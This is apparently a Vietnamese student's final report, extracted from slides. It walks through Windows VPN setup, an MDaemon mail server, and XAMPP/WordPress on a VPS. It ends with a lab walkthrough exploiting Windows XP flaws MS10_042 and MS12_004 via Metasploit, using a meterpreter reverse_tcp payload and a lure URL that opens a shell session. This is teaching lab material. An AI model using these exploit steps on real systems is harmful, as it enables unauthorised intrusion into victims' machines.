Routing
and remote
Access
Click chuột
phải vào
server bà
chọn
Configure
and Enable
Routing
and Remote
Access.

82
Cửa sổ
Routing
and remote
access
server setup
wizard hiện
lên ta Click
Next>
Ta chọn
Custom
Configutati
on.

83
Đánh dấu
vào 2 mục
VPN access
và mục Lan
routing.
Click
Next>
Click
Finish để
tiến hành
kích hoạt.

84
Click Yes
để bắt đầu.
Routing
and Remote
Acces đã
sẵn sàng.
Để cấu
hình dãi địa
chỉ IP khi
các máy
Client truy
cập vào
VPN sẽ
đƣợc cấp ta
right click
vào Server
và chọn
Properties.

85
Chuyễn
sang tab IP
và chọn
Static
andress
pool.
Nhập dãy
địa chỉ bắt
đầu vào
Start IP
address và
dãy địa chỉ
kết thúc
vvào End
IP address
và Click
OK để chấp
nhận.

86
Nhƣ vậy
chúng ta đã
hoàn tất
cấu hình
cho phép
có thể truy
cập VPN
vào máy
chủ. Tiếp
theo ta cần
tào tài
khoảng để
có thể đăng
nhập vào
máy chủ.
Bằng cách
Right click
vào My
conputer và
chọn
Manage.
Tiếp theo ta
vào System
tools 
Local Users
and Groups
 Users

87
Right Click
vào User và
chọn New
User…
Tạo 1 user
và điền tên
user vào
mục User
name và
mật khẩu
vào ô
Password
và nhập lại
mật khẩu
vào ô
Confim
password.
Click
Create để
tạo user.

88
Tƣợng tự
tạo 1 user
khác có tên
là client 2
Để User có
quyền truy
cập VPN ta
right click
vào tài
khoảng cần
cấp quyền
và chọn
Properties

89
Sang tab
Dial-in và
chọn Allow
Access để
cấp quyền
và click
OK để
hoàn tất.
Tƣơng tự
cho user có
tên là
Client2.
Chuẩn bị 2
máy ảo.
Trên máy
ảo thứ 1 ta
vào Start
Settings
 Network
Connection
s.

90
Click vào
Create a
new
Connection
.
Hộp thoại
New
Connection
Wizard
hiện lên và
click Next>

91
Chọn mục
Connect to
the
Network at
my
workplace
và click
Next>
Click chọn
Virual
Private
Network
connection
và chọn
Next>

92
Nhập tên
công ty vào
ô company
name và
click Next>
Click Do
not dial the
intial
connection
và click
Next>

93
Nhập địa
chỉ IP của
máy chủ
hoặc tên
domain đã
đăng ký và
click Next>
Chọn
Anyone’s
use và click
Next>

94
Chọn add a
shortcut to
this
connection
to my
desktop để
thuận tiện
cho lần kết
nối sau và
click Finish
để hoàn tất.
Màn hình
đăng nhập
hiện lên ta
nhập tên
User và
Password
cần kết nối
và click
Connect.

95
Sau khi kết
nối thành
công thì
bên góc
phải màn
hình sẽ có
kết nối
mạng thứ 2.
Double
click vào
biểu tƣợng
mạng kết
nối 
chuyển
sang tab
Details để
xem chi
tiết.

96
Các bƣớc
thực hiện
tƣơng tự
cho Client
2. Và kết
quả cho
Client 2
nhƣ sau.
Trên
Client1 tiến
hành ping
đến địa chỉ
Clien2.

97
Và trên
Client 2
ping đến
địa chỉ
Clien1.
Trên Clien1
tiến hành
share 1
folder cho
Clien 2.
Bằng cách
tạo 1 folder
 right
click chọn
properties
 tab
sharing 
chọn Share
this folder
 click
OK.

98
Trên Client
2 vào Start
 run 
gõ //địa chỉ
client 2
(10.0.0.101
) và click
OK.
Đã thấy
đƣợc thƣ
mục mà
Client 1 đã
share.
Nhƣ vậy chúng ta đã hoản thành việc cài đặt và cấu hình VPN client to site.
2.3.2 Làm việc với Winsdows Server 2008 trên máy chủ ảo VPS (Virtual private
server)
 VPS theo lƣu lƣợng là loại hình máy chủ VPS tiện dụng, phù hợp & đem lại
nhiều lợi ích, hiệu quả cho các khách hàng mong muốn có một máy chủ riêng
với chi phí CỰC THẤP.
 VPS là dịch vụ máy chủ chạy dƣới dạng chia sẻ từ 1 tài nguyên server chính
hoạt động nhƣ một Dedicated Server. Ngƣời quản trị (khách hàng) có quyền
cao nhất để toàn quyền quản trị Server.
 VPS kết nối Internet với 01 IP tĩnh và đƣợc cài đặt sẵn hệ điều hành tùy chọn.
VPS quản trị từ xa và cài đặt các phần mềm theo nhu cầu mà không bị giới
hạn số lƣợng domain.
 VPS thích hợp cho việc xây dựng hệ thống Mail Server, Web Server,
Backup/Storage Server... dùng riêng hoặc truyền tải file dữ liệu giữa các chi
nhánh với nhau một cách dễ dàng, nhanh chóng thuận tiện và bảo mật.
 VPS dễ dàng nâng cấp tài nguyên mà không cần trang bị phần cứng máy chủ
giảm tối đa chi phí.
 VPS dễ dàng tái tạo lại hệ điều hành khi gặp sự cố hệ thống với thời gian thực
hiện rất nhanh mà hoàn toàn không cần cài đặt lại từ đầu.

99
 VPS nhƣ một giải pháp dung hòa giữa Web Hosting và Dedicated Server theo
cả nghĩa chi phí và cách thức vận hành, vì vậy đây là giải pháp phù hợp cho
các cá nhân hoặc doanh nghiệp nhỏ muốn có một hệ thống máy chủ riêng biệt,
toàn quyền quản lý với Chi Phí Thấp.
Hình 2.3.2.1 Giao diện Remote Desktop Connection
Thông qua chƣơng trình Remote Desktop Connection ta truy cập vào VPS đã
đƣợc thuê để tiến hành cấu hình, triển khai các dịch vụ nhƣ trên máy thật.
Hình 2.3.2.2 Giao diện ban đầu khi đăng nhập vào máy chủ VPS
Chúng ta tiến hành nhập User name và Password đã đƣợc cung cấp từ bên cho
thuê để truy cập vào.

100
Hình 2.3.2.3 Giao diện khi đã đăng nhập vào máy chủ VPS
2.3.2.1 Mail Server trên máy chủ ảo VPS.
Đăng nhập
máy chủ
ảo VPS
bằng công
cụ Remote
Desktop.

101
Đăng nhập
vào máy
chủ ảo.
Dowload
bộ cài đặt
Mdeamon
và chạy
file
Setup.exe
Trƣớc tiên, bạn tải
phiên bản
MDaemon Mail
Server mới nhất
và bắt đầu quá
trình cài
đặt.Bấm "Next" đ
ể tiếp tục.

102
Đánh dấu vào ô "I
have read and I
agree with all the
terms of this
license
agreement"
Chọn đƣờng dẫn
lƣu trữ của
chƣơng trình, mặc
định sẽ là ổ C hệ
thống (ổ đĩa có cài
hệ điều hành
Microsoft
Windows).
Lựa chọn phiên
bản cài đặt, nếu
bạn có key đăng
ký thì nhập vào ô
phía dƣới. Ở ví dụ
sử dụng là phiên
bản free hoặc
miễn phí 30 ngày
của phiên bản Pro.

103
Tùy chọn các
thông tim phù hợp
với vị trí, ở đây là
VietNam
Điền đúng thông
tin về quy mô của
tổ chức hoặc công
ty.
Sau khi hoàn tất
các bƣớc trên,
chọn "Next" để
bắt đầu cài đặt.

104
Chờ đợi cho quá
trình cài đặt hoàn
tất.
Điền tên Domain
chính xác ví
dụ:thaivanchuong.
tk
Điền địa chỉ DNS
chính (Primary)
và dự phòng
(Backup)

105
Giữ nguyên lựa
chọn "Setup
MDaemon as a
system service"
Bấm "Finish" để
kết thúc quá trình
cài đặt và cấu
hình ban đầu, bắt
đầu sử dụng

106
Giao diện sau khi
cài đặt thành
công.
Tạo 1 tài khoảng
mới vào Account
 New
Account…

107
Nhập thông tin
vào Email address
và Email
Password. Click
OK để tạo tài
khoảng Email.
Vào OutLook
Mail.

108
Cấu hình Out
Look mail để
quán lý mail cho
tài khoảng
test@thaivanchuo
ng.tk
. Nhập tên hiện thị
vào Display name
và click Next>
Nhập địa chỉ
Email và Click
Next>

109
Nhập địa chỉ IP
vào 2 ô Incoming
và Outgoing và
click Next.
Nhập tên tài
khoảng và mật
khẩu. Click Next.

110
Click Finish để
hoàn tất cấu hình
quản lý mail cho
tài khoảng test.
Tạo mail để kiểm
ra việc gửi mail từ
tài khoảng test
đến 1 e mail bất
kỳ.

111
Vào mail đƣợc
gửi và kiểm tra
Mail.
Xem mail tu tài
khoảng
test@thaivanchuo
ng.tk
Trả lời lại Mail
của tài khoảng
test@thaivanchuo
ng.tk

112
Vào lại mail của
tài khoảng
test@thaivanchuo
ng.tkvà đã nhận
đƣợc hồi âm.
Nhƣ vậy chúng ta đã hoàn thành việc cài đặt và quản lý 1 mail Server trên
phần mềm Mdeamon.
2.3.2.2 Kết Nối VPN thông qua máy chủ ảo VPS.
Việc triển khai một mạng riêng ảo có nhiều dịch vụ và chức năng cần
phải làm việc cùng nhau một cách trôi chảy và dễ dàng, vì vậy những
ngƣời dùng truy cập từ xa có thể đƣợc định danh và xác thực; các đƣợc
hầm có thể đƣợc tạo lập, duy trì và quản lý cho hàng trăm ngƣời dùng;
việc định tuyến có thể kiểm soát tất cả luồng lƣu lƣợng qua Gateway,
và trong khi tất các những thứ này đang tiếp tục, hiệu suất và sự an toàn
cần đƣợc duy trì.
Các thành phầm phải đƣợc cài đặt để tạo ra một hệ thống mạng riêng
ảo hoạt động đúng đắn. Để đƣa ra quyết định đúng lúc triển khai các
kết nối mạng riêng ảo truy cập từ xa, ta phải hiểu tất cả các thành phần
liên quan. Trong chƣơng "Tổng quan về mạng riêng ảo" chúng ta đã
thảo luận về kiểu kịch bản mạng riêng ảo truy cập từ xa, trong đó nhiều
Client truy cập tới một cổng kết nối đơn vào các tài nguyên trong mạng

113
Intranet. Trong phần này ta sẽ mô tả các thành phần của các kết nối
mạng riêng ảo truy cập từ xa và các quan điểm thiết kế gắn với chúng.
Mô hình VPN Client to Site:
Hình 2.3.1.1.7.1 Mô hình VPN Client to Site.
Để cấu hình và thiết lập kết nối VPN Client to Site trải qua các bƣớc sau:
Đăng nhập
vào máy
chủ ảo VPS
với quyền
quản trị.

114
Vào Start

Programs

Administrat
ive Tools
 Routing
and remote
access để
cấu hình.
Giao diện
Routing
and remote
Access

115
Click chuột
phải vào
server bà
chọn
Configure
and Enable
Routing
and Remote
Access.
Cửa sổ
Routing
and remote
access
server setup
wizard hiện
lên ta Click
Next>

116
Ta chọn
Custom
Configutati
on.
Đánh dấu
vào 2 mục
VPN access
và mục Lan
routing.
Click
Next>

117
Click
Finish để
tiến hành
kích hoạt.
Click Yes
để bắt đầu.
Routing
and Remote
Acces đã
sẵn sàng.

118
Để cấu
hình dãi địa
chỉ IP khi
các máy
Client truy
cập vào
VPN sẽ
đƣợc cấp ta
right click
vào Server
và chọn
Properties.
Chuyễn
sang tab IP
và chọn
Static
andress
pool.

119
Nhập dãy
địa chỉ bắt
đầu vào
Start IP
address và
dãy địa chỉ
kết thúc
vvào End
IP address
và Click
OK để chấp
nhận.
Nhƣ vậy
chúng ta đã
hoàn tất
cấu hình
cho phép
có thể truy
cập VPN
vào máy
chủ. Tiếp
theo ta cần
tào tài
khoảng để
có thể đăng
nhập vào
máy chủ.
Bằng cách
Right click
vào My
conputer và
chọn
Manage.

120
Tiếp theo ta
vào System
tools 
Local Users
and Groups
 Users
Right Click
vào User và
chọn New
User…

121
Tạo 1 user
và điền tên
user vào
mục User
name và
mật khẩu
vào ô
Password
và nhập lại
mật khẩu
vào ô
Confim
password.
Click
Create để
tạo user.
Tƣợng tự
tạo 1 user
khác có tên
là client 2

122
Để User có
quyền truy
cập VPN ta
right click
vào tài
khoảng cần
cấp quyền
và chọn
Properties
Sang tab
Dial-in và
chọn Allow
Access để
cấp quyền
và click
OK để
hoàn tất.
Tƣơng tự
cho user có
tên là
Client2.

123
Chuẩn bị 2
máy ảo.
Trên máy
ảo thứ 1 ta
vào Start
Settings
 Network
Connectios
Click vào
Create a
new
Connection
.

124
Hộp thoại
New
Connection
Wizard
hiện lên và
click Next>
Chọn mục
Connect to
the
Network at
my
workplace
và click
Next>

125
Click chọn
Virual
Private
Network
connection
và chọn
Next>
Nhập tên
công ty vào
ô company
name và
click Next>

126
Click Do
not dial the
intial
connection
và click
Next>
Nhập địa
chỉ IP của
máy chủ
hoặc tên
domain đã
đăng ký và
click Next>

127
Chọn
Anyone’s
use và click
Next>
Chọn add a
shortcut to
this
connection
to my
desktop để
thuận tiện
cho lần kết
nối sau và
click Finish
để hoàn tất.

128
Màn hình
đăng nhập
hiện lên ta
nhập tên
User và
Password
cần kết nối
và click
Connect.
Sau khi kết
nối thành
công thì
bên góc
phải màn
hình sẽ có
kết nối
mạng thứ 2.

129
Double
click vào
biểu tƣợng
mạng kết
nối 
chuyển
sang tab
Details để
xem chi
tiết.
Các bƣớc
thực hiện
tƣơng tự
cho Client
2. Và kết
quả cho
Client 2
nhƣ sau.

130
Trên
Client1 tiến
hành ping
đến địa chỉ
Clien2.
Và trên
Client 2
ping đến
địa chỉ
Clien1.

131
Trên Clien1
tiến hành
share 1
folder cho
Clien 2.
Bằng cách
tạo 1 folder
 right
click chọn
properties
 tab
sharing 
chọn Share
this folder
 click
OK.
Trên Client
2 vào Start
 run 
gõ //địa chỉ
client 2
(10.0.0.101
) và click
OK.

132
Đã thấy
đƣợc thƣ
mục mà
Client 1 đã
share.
Nhƣ vậy chúng ta đã hoản thành việc cài đặt và cấu hình VPN client to site.
2.3.2.3 Cài đặt và cấu hình Web Server trên VPS.
XAMPP là một bộ công cụ lập trình PHP có thể cài đặt đƣợc trên nhiều
nền tảng khác nhau. Chữ X đầu tiên trong cụm từ XAMPP ám chỉ
cross-platform nghĩa là XAMPP có thể chạy trên Windows, Linux,
Mac OS, Solaris, còn các ký tự còn lại mang các ý nghĩa sau:
A = Apache, XAMPP bao gồm 1 Apache HTTP Server giúp chạy các ứng
dụng web.
M = MySQL, hệ quản trị cơ sở dữ liệu My SQL cũng đƣợc bao gồm trong
XAMPP.
P = PHP – ngôn ngữ lập trình PHP.
P = Perl – ngôn ngữ lập trình Perl.
Sau đây chúng ta cùng cài đặt và cấu hình Web Server bằng Xampp 1.7.3
Chúng ta
dowload và tiến
hành cài đặt bằng
file
Bạn chọn ngôn
ngữ cài đặt là
English và nhấn
OK để tiếp tục.

133
Bạn nhấn Next ở
màn hình tiếp
theo.
Theo mặc định
XAMPP sẽ đƣợc
cài đặt vào ổ C
theo đƣờng dẫn
C:xampp, bạn có
thể nhấn Browse
và chọn đƣờng
dẫn cài đặt khác

134
Bạn nhận chọn
các service kèm
theo XAMPP
trong mục
SERVICE
SECTION sau đó
nhấn Install để
tiếp tục.
Màn hình hiển thị
tiến độ cài đặt
XAMPP hiện ra.

135
Quá trình cài đặt
XAMPP hoàn tất,
bạn nhấn vào nút
Finish kết thúc.
XAMPP sẽ tự
động cài đặt các
service mà bạn đã
chọn ở mục
SERVICE
SECTION bên
trên, đầu tiên là
Apache service.
Tiếp đó là
MySQL service
Quá trình cài đặt
các service hoàn
tất, bạn nhấn OK
để tiếp tục.

136
Bạn nhấn OK ở
màn hình tiếp
theo để bật
XAMPP Control
Panel.
Sau khi cài đặt
xong các bạn
click Start ở mục
Apache và MySql
trong XAMOO
Control Panel
Application.
Vào trình duyệt
web và gõ vào
localhost. Và
chọn ngôn ngữ là
English.

137
Sau khi chọn
ngôn ngữ chúng
ta và click pHp
my admin.
Bạn nhập tên cơ
sở dữ liệu vào ô
create new
database và click
Create để tạo
database.

138
Và Databae đã
đƣợc tạo.
Tiếp theo các bạn
vào đƣờng dẫn
cài đặt
xampphtdocs và
copy mã nguồn
wordpress mà
chúng ta đã
dowload trên
internet.
Vào thƣ mục
wordpress mà
chúng ta vừa mới
copy xong và tìm
file wp-config-
sample.php và
mở nó lên bằng
word pad.
Tìm và sửa thông
tin lại nhƣ hình.

139
Đổi tên file vừa
sửa chửa thành
wp-config.php
Vào đƣờng dần
localhost/wordpre
ss/wp-
admin/install.php.
Sau đó điền các
thông tin cần
thiết.

140
Sau đó click Cài
đặt WordPess.
Cấu hình
Wordpress thành
công. Ta Click
Đăng Nhập.

141
Bạn điền thông
tin vừa thiết lập
vừa rồi và click
Đăng Nhập.
Màn hình sau khi
đăng nhập thành
công.

142
Ta vào Cài đặt 
Tổng Quan
điền địa chỉ
chúng ta muốn
truy cập khi
chúng ta lƣớt web
vào 2 ô
Wordpress
address và Site
Address.
Và đây là trang
chủ của trang
Web chúng ta khi
vừa tạo xong.
Nhƣ vậy chúng ta đã hoàn thành việc tạo 1 trang web cho riêng mình.

143
2.3.3 Bảo mật Windows
2.3.3.1 Khai thác lỗ hổng trên Windows XP với mã lỗi MS10_042
Chuẩn bị 2
máy ảo:
Windows XP
(nạn nhân) và
máy Back
Track 5r3 (máy
tấn công nạn
nhân)
Trên máy Back
Track cấu hình
địa chỉ IP trong
bài lab này cho
máy là:
192.168.1.5
Trên máy Back
track vào
chƣơng trình
terminal và gõ
lệnh
msfconsole

144
Tìm mã lỗi
bằng công cụ
metaploit bằng
cách gõ lệnh
search
ms10_042
Sau khi seach
đƣợc mã lỗi ta
dùng lệnh use
và copy mã lỗi
đã tìm đƣợc.
Dùng lệnh
show options
để biết thêm
các câu lệnh
cần thiết.

145
Dùng lệnh
SRVHOST
<địa chỉ ip
máy
backtrack>
Dùng lệnh set
PAYLOAD
windows/meter
preter/preverse
_tcp
Dùng lệnh set
LHOST <ip
backtrack>
Dùng lệnh
exploit để tiến
hành khai thác
lỗi. Chú ý
đƣờng dẫn
http://192.168.
1.5:80/ nếu
máy nạn nhân
vào đƣờng dẫn
này sẽ bị hack.

146
Trở lại máy
Windows XP.
Kiểm tra địa
chỉ IP máy XP.
Với địa chỉ ip
máy XP là
192.168.1.6
Trên máy XP
ta vào trình
duyệt web và
gõ đƣờng dẫn
http://192.168.
1.5:80/
Trên máy XP
tự động xuất
hiện hộp thoại
Help and
Support.

147
Trên máy Back
Track bắt đầu
nhận thấy có
sự kết nối đến
địa chỉ
http://192.168.
1.5:80/
Và nhận thấy
có địa chỉ
192.168.1.6 kết
nối vào. Và tạo
phiên kết nối
vào nó.
Trên máy back
track ta gõ lệnh
sessions để
kiểm tra.
Dùng lệnh
sessions –i 1

148
Dùng lệnh
sysinfo để xem
thông tin máy
nạn nhân. Và
nhƣ vậy ta đã
khai thác thành
công lỗ hổng
MS10_042
trên máy XP.
2.3.3.2 Khai thác lỗ hổng bảo mật Win XP mã lỗi MS12_004
Chuẩn bị 2
máy ảo:
Windows
XP (nạn
nhân) và
máy Back
Track 5r3
(máy tấn
công nạn
nhân)
Trên máy
Back
Track cấu
hình địa
chỉ IP
trong bài
lab này
cho máy

149
là:
192.168.1.
5
Trên máy
Back track
vào
chƣơng
trình
terminal và
gõ lệnh
msfconsole
Tìm mã lỗi
bằng công
cụ
metaploit
bằng cách
gõ lệnh
search
ms12_004

150
Sau khi
seach đƣợc
mã lỗi ta
dùng lệnh
use và
copy mã
lỗi đã tìm
đƣợc.
Dùng lệnh
show
options để
biết thêm
các câu
lệnh cần
thiết.
Dùng lệnh
SRVHOST
<địa chỉ ip
máy
backtrack>

151
Dùng lệnh
set payload
windows/
meterprete
r/preverse_
tcp
Dùng lệnh
set LHOST
<ip
backtrack>
Dùng lệnh
exploit để
tiến hành
khai thác
lỗi. Chú ý
đƣờng dẫn
http://192.
168.1.5:80
80/ nếu
máy nạn
nhân vào
đƣờng dẫn
này sẽ bị
hack.

152
Trở lại
máy
Windows
XP. Kiểm
tra địa chỉ
IP máy
XP. Với
địa chỉ ip
máy XP là
192.168.1.
6
Trên máy
XP ta vào
trình duyệt
web và gõ
đƣờng dẫn
http://192.
168.1.5:80/
Trên máy
XP tự động
xuất hiện
hộp thoại
yêu cầu
chạy
Windows
Media
Player.
Nếu chọn
Run sẽ bị

Bao cao cuoi ky

Recommended

Recommended

More Related Content

What's hot

What's hot (20)

Viewers also liked

Viewers also liked (14)

Similar to Bao cao cuoi ky

Similar to Bao cao cuoi ky (20)

Bao cao cuoi ky